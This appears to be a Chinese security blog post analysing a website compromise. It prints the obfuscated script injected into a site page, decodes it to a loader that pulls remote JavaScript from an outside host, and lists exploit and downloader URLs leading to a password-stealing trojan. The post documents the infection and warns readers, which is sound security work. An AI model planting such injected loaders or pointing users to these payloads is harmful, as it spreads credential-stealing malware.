网站地址:http://www.jntv.com.cn
信息来源:http://bbs.kafan.cn/viewthread.php?tid=219369
挂马情况:在http://www.jntv.com.cn/top.htm页面底部.植入加密代码
代码
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x48\x54\x54\x50\x3A\x2F\x2F\x4F\x46\x46\x49\x43\x45\x2E\x46\x41\x51\x53\x45\x52\x56\x2E\x43\x4F\x4D\x2F\x66\x61\x71\x2E\x4A\x53\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
解密后地址:
<script>document.writeln("<script src="HTTP://OFFICE.FAQSERV.COM/faq.JS"></script>");</script>
具体的漏洞利用:
Log is generated by FreShow.
[wide]/Article/UploadFiles/200803/20080317095557927.gif
[object]http://w18.vg/s.exe
[暴风2-失效了]http://w18.vg/bf.gif
[迅雷-失效了]http://w18.vg/xl.gif
[Real]http://w18.vg/real.gif
[object]http://w18.vg/s.exe
[联众]http://w18.vg/lz.gif
[object]http://w18.vg/s.exe
s.exe是个短小精悍的下载者..会下载w18.vg/ss.exe至于ss.exe具体有什么动作就不知道了FFI脱不掉壳.
s.exe大部分杀毒软件都可以咔嚓掉,不过国产瑞星对其视而不见...
s.exe的扫描结果:http://virscan.org/report/e5db3a1fd2f69452b1f4443e8fb13d74.html
ss.exe是盗号木马这下瑞星查到了,不过大名鼎鼎的卡巴不认识...
ss.exe的扫描结果:http://virscan.org/report/cd242ed6cdda68ca4b469c5ebf724b48.html
不过想想也没什么..杀毒软件厂商也非圣贤,他们也是需要有人提交样本,俺也想提交病毒样本,不过没有门路,
这些域名早就已经封过了,所以使用本站HOSTS的朋友就当是看个热闹就可以了..
古有句老话,叫换汤不换药,如今这些病毒是换药不换汤....w18.vg的boss貌似对自己N有信心哈.
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)